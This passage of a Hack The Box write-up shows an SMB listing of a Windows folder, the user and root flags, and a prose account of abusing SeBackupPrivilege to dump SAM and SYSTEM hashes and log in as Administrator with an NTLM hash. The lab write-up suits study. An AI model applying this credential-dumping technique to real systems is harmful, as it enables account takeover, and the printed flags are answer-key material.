Speech_OneCore D 0 Sat May 8 13:50:24 2021
splwow64.exe A 192512 Fri Aug 30 04:11:10 2024
System D 0 Sat May 8 13:50:24 2021
system.ini A 219 Sat May 8 13:48:31 2021
System32 D 0 Wed Feb 19 16:35:50 2025
SystemApps D 0 Sat May 8 14:04:51 2021
SystemResources D 0 Mon Sep 23 22:05:41 2024
SystemTemp D 0 Wed Feb 19 16:59:41 2025
SYSVOL D 0 Thu Mar 14 16:38:56 2024
SysWOW64 D 0 Mon Sep 23 22:05:41 2024
TAPI D 0 Sat May 8 13:50:24 2021
Tasks D 0 Fri Mar 15 00:56:17 2024
Temp D 0 Wed Feb 19 16:36:49 2025
tracing D 0 Sat May 8 13:50:24 2021
twain_32 D 0 Sat May 8 13:50:33 2021
twain_32.dll A 82944 Mon Sep 23 21:57:59 2024
Vss D 0 Sat May 8 13:50:24 2021
WaaS D 0 Sat May 8 13:50:24 2021
Web D 0 Sat May 8 14:04:51 2021
win.ini A 92 Sat May 8 13:48:31 2021
WindowsShell.Manifest AHR 670 Sat May 8 13:44:27 2021
WindowsUpdate.log A 276 Wed Feb 19 23:36:56 2025
winhlp32.exe A 12288 Sat May 8 13:45:10 2021
WinSxS D 0 Mon Sep 23 22:06:57 2024
WMSysPr9.prx A 316640 Sat May 8 13:44:02 2021
write.exe A 28672 Sat May 8 03:28:00 2021
4168447 blocks of size 4096. 420048 blocks available
I honestly don’t know where to see now, as this is my first windows machine in HTB. So I randomly checked and got nowhere.
Similarly I checked the C$ share and slowly navigated to Emily user Desktop and found the user.txt file User flag: 850e88885d9cc255bd699fe0e1372612
After this the machine I was playing was already spoiled and rooted, so I tried to reset multiple time, not successful. So I sticked with the writeup for my learning. Anyways I wouldn’t have gone far for the privilege escalation
Privilege Escalation
![[Screenshot 2025-02-19 at 18.35.26.png]] We have high privilege than required - SeBackupPrivilege So dumping the SAM and system hash databases.
![[Screenshot 2025-02-19 at 18.37.59.png]]
![[Screenshot 2025-02-19 at 18.40.02.png]] From the NTLM hash we can connect to Administrator and get the root.txt from Deskop
Root flag: 1c29d8a676c3db97081e0200710ae19f
This post is licensed under CC BY 4.0 by the author.